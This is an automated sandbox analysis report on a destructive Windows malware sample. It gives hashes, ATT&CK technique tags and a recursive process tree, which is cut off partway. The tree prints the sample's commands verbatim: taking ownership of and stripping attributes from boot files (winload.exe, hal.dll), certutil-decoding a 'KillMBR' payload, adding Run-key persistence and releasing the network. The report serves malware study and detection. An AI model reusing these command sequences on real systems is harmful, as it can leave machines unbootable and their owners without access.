690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

Analysis

max time kernel
149s
max time network
103s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-11-2024 04:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
Size

112KB
MD5

81a7a946456f1f6dae4715b1feb72ed0
SHA1

af83b938017efd53f95671adc0c6d2aa1088d38e
SHA256

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408
SHA512

a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692
SSDEEP

3072:O7DhdC6kzWypvaQ0FxyNTBfHdIyEGfvBN+:OBlkZvaF4NTB/yyEGfvBQ

Score

8^/10

defense_evasion discovery evasion exploit upx

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 7 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
9916	netsh.exe
8632	netsh.exe
2648	netsh.exe
1460	netsh.exe
5688	netsh.exe
620	netsh.exe
7352	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exe

pid	Process
6004	takeown.exe
8920	takeown.exe
9132	takeown.exe
9176	takeown.exe
372	takeown.exe
8660	takeown.exe
9416	icacls.exe
10212	icacls.exe
10464	takeown.exe
7500	takeown.exe
5480	icacls.exe
9552	takeown.exe
8304	icacls.exe
10264	takeown.exe
2364	icacls.exe
10884	takeown.exe
7828	takeown.exe
3060	takeown.exe
5944	icacls.exe
9196	icacls.exe
10356	takeown.exe
10392	takeown.exe
5996	takeown.exe
8508	icacls.exe
9340	icacls.exe
7712	takeown.exe
8308	takeown.exe
8788	takeown.exe
5544	takeown.exe
8876	icacls.exe
6168	icacls.exe
8892	icacls.exe
10376	icacls.exe
7716	takeown.exe
9784	icacls.exe
4480	takeown.exe
4968	takeown.exe
5220	takeown.exe
2712	icacls.exe
7468	icacls.exe
9512	icacls.exe
11096	takeown.exe
4104	icacls.exe
5936	takeown.exe
1784	icacls.exe
448	icacls.exe
1808	icacls.exe
5868	takeown.exe
8056	takeown.exe
10164	takeown.exe
11248	icacls.exe
2544	icacls.exe
1912	takeown.exe
6968	takeown.exe
8828	takeown.exe
8892	takeown.exe
5696	icacls.exe
4312	takeown.exe
1792	takeown.exe
10384	takeown.exe
6172	takeown.exe
4328	icacls.exe
2496	icacls.exe
4296	takeown.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe

Executes dropped EXE 1 IoCs

Processes:

Tasksvc.exe

pid	Process
4856	Tasksvc.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	Process
8876	takeown.exe
2452	icacls.exe
5940	takeown.exe
860	icacls.exe
8212	takeown.exe
7992	takeown.exe
10464	takeown.exe
3404	icacls.exe
4968	takeown.exe
8688	takeown.exe
7372	takeown.exe
5960	icacls.exe
2524	takeown.exe
860	takeown.exe
8788	takeown.exe
8400	takeown.exe
180	takeown.exe
4632	takeown.exe
5460	icacls.exe
6004	takeown.exe
5064	icacls.exe
8892	icacls.exe
7716	takeown.exe
372	takeown.exe
2712	icacls.exe
5996	takeown.exe
9784	icacls.exe
448	icacls.exe
2572	takeown.exe
10212	icacls.exe
4408	takeown.exe
7712	takeown.exe
9132	takeown.exe
8304	icacls.exe
10380	icacls.exe
9176	takeown.exe
4928	takeown.exe
5416	takeown.exe
1848	takeown.exe
4312	icacls.exe
5468	takeown.exe
5944	icacls.exe
5148	takeown.exe
6584	takeown.exe
6364	icacls.exe
10384	takeown.exe
1784	icacls.exe
6136	takeown.exe
2364	icacls.exe
11064	icacls.exe
4460	takeown.exe
6068	icacls.exe
7828	takeown.exe
3060	takeown.exe
5544	takeown.exe
2496	icacls.exe
8920	takeown.exe
10896	icacls.exe
10468	icacls.exe
1836	icacls.exe
6968	takeown.exe
11096	takeown.exe
1912	takeown.exe
8828	takeown.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

Processes:

certutil.exe

pid	Process
1596	certutil.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies boot configuration data using bcdedit 7 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	Process
1912	bcdedit.exe
5656	bcdedit.exe
3668	bcdedit.exe
8696	bcdedit.exe
9536	bcdedit.exe
10808	bcdedit.exe
11012	bcdedit.exe

Drops autorun.inf file 1 TTPs 1 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

cmd.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe

Drops file in System32 directory 3 IoCs

Processes:

attrib.exeattrib.exeattrib.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\winresume.exe	attrib.exe
File opened for modification	C:\Windows\System32\winload.exe	attrib.exe
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023cd4-262.dat	upx
behavioral2/memory/4856-265-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/4856-320-0x0000000000400000-0x000000000040E000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exeTasksvc.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tasksvc.exe

Gathers network information 2 TTPs 15 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	Process
4472	ipconfig.exe
7064	ipconfig.exe
10456	ipconfig.exe
2480	ipconfig.exe
5816	ipconfig.exe
5196	ipconfig.exe
10344	ipconfig.exe
3840	ipconfig.exe
7076	ipconfig.exe
2344	ipconfig.exe
5124	ipconfig.exe
10372	ipconfig.exe
2688	ipconfig.exe
6936	ipconfig.exe
6104	ipconfig.exe

Modifies registry key 1 TTPs 40 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	Process
10136	reg.exe
2564	reg.exe
2452	reg.exe
5560	reg.exe
9244	reg.exe
10800	reg.exe
7376	reg.exe
7648	reg.exe
9032	reg.exe
10092	reg.exe
6764	reg.exe
11084	reg.exe
6136	reg.exe
7416	reg.exe
3272	reg.exe
9588	reg.exe
8304	reg.exe
6452	reg.exe
5944	reg.exe
7788	reg.exe
9036	reg.exe
6952	reg.exe
2480	reg.exe
6168	reg.exe
10920	reg.exe
7152	reg.exe
7184	reg.exe
10364	reg.exe
3316	reg.exe
4480	reg.exe
4552	reg.exe
7308	reg.exe
7924	reg.exe
5872	reg.exe
8492	reg.exe
5536	reg.exe
4824	reg.exe
5188	reg.exe
5780	reg.exe
7500	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

takeown.exetakeown.exetakeown.exetakeown.exe

description	pid	Process
Token: SeTakeOwnershipPrivilege	3256	takeown.exe
Token: SeTakeOwnershipPrivilege	1164	takeown.exe
Token: SeTakeOwnershipPrivilege	4408	takeown.exe
Token: SeTakeOwnershipPrivilege	2252	takeown.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.execmd.execmd.exe

description	pid	Process	procid_target
PID 2616 wrote to memory of 1228	2616	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	84
PID 2616 wrote to memory of 1228	2616	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	84
PID 1228 wrote to memory of 4024	1228	cmd.exe	85
PID 1228 wrote to memory of 4024	1228	cmd.exe	85
PID 1228 wrote to memory of 3256	1228	cmd.exe	87
PID 1228 wrote to memory of 3256	1228	cmd.exe	87
PID 1228 wrote to memory of 4104	1228	cmd.exe	88
PID 1228 wrote to memory of 4104	1228	cmd.exe	88
PID 1228 wrote to memory of 4212	1228	cmd.exe	89
PID 1228 wrote to memory of 4212	1228	cmd.exe	89
PID 4024 wrote to memory of 1164	4024	cmd.exe	90
PID 4024 wrote to memory of 1164	4024	cmd.exe	90
PID 1228 wrote to memory of 4408	1228	cmd.exe	91
PID 1228 wrote to memory of 4408	1228	cmd.exe	91
PID 1228 wrote to memory of 3036	1228	cmd.exe	92
PID 1228 wrote to memory of 3036	1228	cmd.exe	92
PID 1228 wrote to memory of 4072	1228	cmd.exe	93
PID 1228 wrote to memory of 4072	1228	cmd.exe	93
PID 1228 wrote to memory of 2252	1228	cmd.exe	94
PID 1228 wrote to memory of 2252	1228	cmd.exe	94
PID 1228 wrote to memory of 448	1228	cmd.exe	95
PID 1228 wrote to memory of 448	1228	cmd.exe	95
PID 1228 wrote to memory of 1560	1228	cmd.exe	96
PID 1228 wrote to memory of 1560	1228	cmd.exe	96
PID 1228 wrote to memory of 1596	1228	cmd.exe	97
PID 1228 wrote to memory of 1596	1228	cmd.exe	97
PID 1228 wrote to memory of 4856	1228	cmd.exe	98
PID 1228 wrote to memory of 4856	1228	cmd.exe	98
PID 1228 wrote to memory of 4856	1228	cmd.exe	98
PID 1228 wrote to memory of 1684	1228	cmd.exe	99
PID 1228 wrote to memory of 1684	1228	cmd.exe	99
PID 1228 wrote to memory of 1196	1228	cmd.exe	188
PID 1228 wrote to memory of 1196	1228	cmd.exe	188
PID 1228 wrote to memory of 2828	1228	cmd.exe	102
PID 1228 wrote to memory of 2828	1228	cmd.exe	102

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
10956	attrib.exe
5740	attrib.exe
6548	attrib.exe
8808	attrib.exe
9968	attrib.exe
10404	attrib.exe
6436	attrib.exe
5436	attrib.exe
1748	attrib.exe
6884	attrib.exe
5680	attrib.exe
5544	attrib.exe
5092	attrib.exe
2848	attrib.exe
4472	attrib.exe
8528	attrib.exe
11156	attrib.exe
11176	attrib.exe
11036	attrib.exe
11244	attrib.exe
2708	attrib.exe
1540	attrib.exe
5144	attrib.exe
1196	attrib.exe
7744	attrib.exe
10208	attrib.exe
6236	attrib.exe
9768	attrib.exe
6132	attrib.exe
9364	attrib.exe
8160	attrib.exe
2572	attrib.exe
3440	attrib.exe
9244	attrib.exe
2304	attrib.exe
5940	attrib.exe
5000	attrib.exe
5956	attrib.exe
5456	attrib.exe
10904	attrib.exe
5672	attrib.exe
4972	attrib.exe
2572	attrib.exe
6312	attrib.exe
10440	attrib.exe
4212	attrib.exe
3996	attrib.exe
4960	attrib.exe
6312	attrib.exe
7788	attrib.exe
9280	attrib.exe
4328	attrib.exe
1712	attrib.exe
4300	attrib.exe
8848	attrib.exe
952	attrib.exe
5592	attrib.exe
5872	attrib.exe
9284	attrib.exe
8332	attrib.exe
9056	attrib.exe
7684	attrib.exe
4072	attrib.exe
4104	attrib.exe

C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
"C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2616
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A335.tmp\A336.tmp\A337.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
  2⤵
  - Drops startup file
  - Drops autorun.inf file
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4024
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1164
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winresume.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3256
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winresume.exe" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:4104
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:4212
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winload.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4408
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winload.exe" /reset /c /q
    3⤵
    PID:3036
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winload.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:4072
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:448
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Drops file in System32 directory
    PID:1560
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp" "Tasksvc.exe"
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:1596
- - C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
    Tasksvc.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4856
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:1684
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SetCursorPos
    3⤵
    PID:1196
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:2828
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:2688
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
    3⤵
    PID:1724
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:2848
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2380
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3876
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3516
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1876
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4220
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:544
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1344
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4204
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3992
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2996
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    PID:5024
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AEDD.tmp\AEDE.tmp\AEDF.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:3972
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:872
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3060
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:372
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:3404
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:2252
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        
        PID:1792
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:4852
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3996
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:2136
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:2452
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:4112
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:1260
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:1348
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:1808
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2480
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:4060
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:2708
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1704
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1236
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2136
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3428
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5108
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4724
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4784
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:852
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3484
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4968
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:2180
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F6C4.tmp\F6C5.tmp\F6D5.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:5252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5208
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:5868
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:5936
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1784
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2572
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6004
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:5064
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:1196
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:5416
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:6168
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:6548
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:7392
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:7700
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:8092
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7076
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:8496
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8848
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5424
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9324
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9440
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9560
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9668
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9752
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9876
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10064
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9228
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9648
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\39D3.tmp\39E3.tmp\39E4.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:9728
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:8836
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:180
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        
        PID:10356
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:11156
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        Modifies file permissions
        
        PID:7372
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9784
        
        C:\Windows\SysWOW64\attrib.exe
        
